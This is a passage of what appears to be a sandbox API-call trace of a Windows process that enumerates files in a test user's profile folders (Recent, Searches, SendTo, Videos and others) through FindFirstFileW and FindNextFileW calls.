hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaee56e50, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0xf83bfd10, ftLastAccessTime.dwHighDateTime=0x1d5dae3, ftLastWriteTime.dwLowDateTime=0xf83bfd10, ftLastWriteTime.dwHighDateTime=0x1d5dae3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8522zzaC3XYMo_", cAlternateFileName="8522ZZ~1")) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da960, ftCreationTime.dwHighDateTime=0x1d5dcf3, ftLastAccessTime.dwLowDateTime=0x78b67740, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0x78b67740, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0xa3c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRTnKoCxG5zieJolr.bmp", cAlternateFileName="NRTNKO~1.BMP")) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e42cda0, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0x4370900, ftLastAccessTime.dwHighDateTime=0x1d5d97e, ftLastWriteTime.dwLowDateTime=0x4370900, ftLastWriteTime.dwHighDateTime=0x1d5d97e, nFileSizeHigh=0x0, nFileSizeLow=0x14b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vOxd2i6c5Aquj.jpg", cAlternateFileName="VOXD2I~1.JPG")) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 1 [0201.049] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0 [0201.049] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.050] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0201.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.050] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.050] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.050] PathFindFileNameW (pszPath="") returned="" [0201.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0xffffffff [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.050] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0201.050] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.050] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.050] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.050] PathFindFileNameW (pszPath="") returned="" [0201.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3ed20, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xedcfbe00, ftLastAccessTime.dwHighDateTime=0x1d5e58a, ftLastWriteTime.dwLowDateTime=0xedcfbe00, ftLastWriteTime.dwHighDateTime=0x1d5e58a, nFileSizeHigh=0x0, nFileSizeLow=0x123f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZS3LC6n3UMM.gif", cAlternateFileName="ZS3LC6~1.GIF")) returned 0xffffffff [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.051] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0201.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.051] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.051] PathFindFileNameW (pszPath="") returned="" [0201.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.051] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.051] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.051] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0201.051] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.051] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0201.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.052] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.052] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.052] PathFindFileNameW (pszPath="") returned="" [0201.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.052] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.052] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.052] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0201.052] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0201.052] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0201.052] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.052] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0201.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.052] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.052] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.052] PathFindFileNameW (pszPath="") returned="" [0201.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c35d0 | out: hHeap=0x2c0000) returned 1 [0201.053] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0201.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.053] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.053] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.053] PathFindFileNameW (pszPath="") returned="" [0201.053] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.053] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0201.053] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.053] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.053] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.053] PathFindFileNameW (pszPath="") returned="" [0201.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0201.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0201.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0288 | out: hHeap=0x2c0000) returned 1 [0201.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.054] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0201.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.054] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.054] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.054] PathFindFileNameW (pszPath="") returned="" [0201.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3628 | out: hHeap=0x2c0000) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdab224a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdab224a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a4399c0, ftCreationTime.dwHighDateTime=0x1d5e37e, ftLastAccessTime.dwLowDateTime=0xb3c11810, ftLastAccessTime.dwHighDateTime=0x1d5e794, ftLastWriteTime.dwLowDateTime=0xb3c11810, ftLastWriteTime.dwHighDateTime=0x1d5e794, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-Na1oMmnUTFTw3KDwZd", cAlternateFileName="-NA1OM~1")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63fc6cf0, ftCreationTime.dwHighDateTime=0x1d5e78d, ftLastAccessTime.dwLowDateTime=0x42056550, ftLastAccessTime.dwHighDateTime=0x1d5e636, ftLastWriteTime.dwLowDateTime=0x42056550, ftLastWriteTime.dwHighDateTime=0x1d5e636, nFileSizeHigh=0x0, nFileSizeLow=0xd0a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5SGmdOZOkvK3.avi", cAlternateFileName="5SGMDO~1.AVI")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x188398a0, ftCreationTime.dwHighDateTime=0x1d5da1a, ftLastAccessTime.dwLowDateTime=0x9f6ccd0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x9f6ccd0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="biDMIzVx5WSAFsePg", cAlternateFileName="BIDMIZ~1")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1a57fd0, ftCreationTime.dwHighDateTime=0x1d5d7e3, ftLastAccessTime.dwLowDateTime=0xcf758270, ftLastAccessTime.dwHighDateTime=0x1d5d7cd, ftLastWriteTime.dwLowDateTime=0xcf758270, ftLastWriteTime.dwHighDateTime=0x1d5d7cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ee2U4KlmK-3zpwEnEyLp", cAlternateFileName="EE2U4K~1")) returned 1 [0201.054] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x30afe540, ftCreationTime.dwHighDateTime=0x1d5e38f, ftLastAccessTime.dwLowDateTime=0x64cca8f0, ftLastAccessTime.dwHighDateTime=0x1d5dfb0, ftLastWriteTime.dwLowDateTime=0x64cca8f0, ftLastWriteTime.dwHighDateTime=0x1d5dfb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iMNzi0f_lMj", 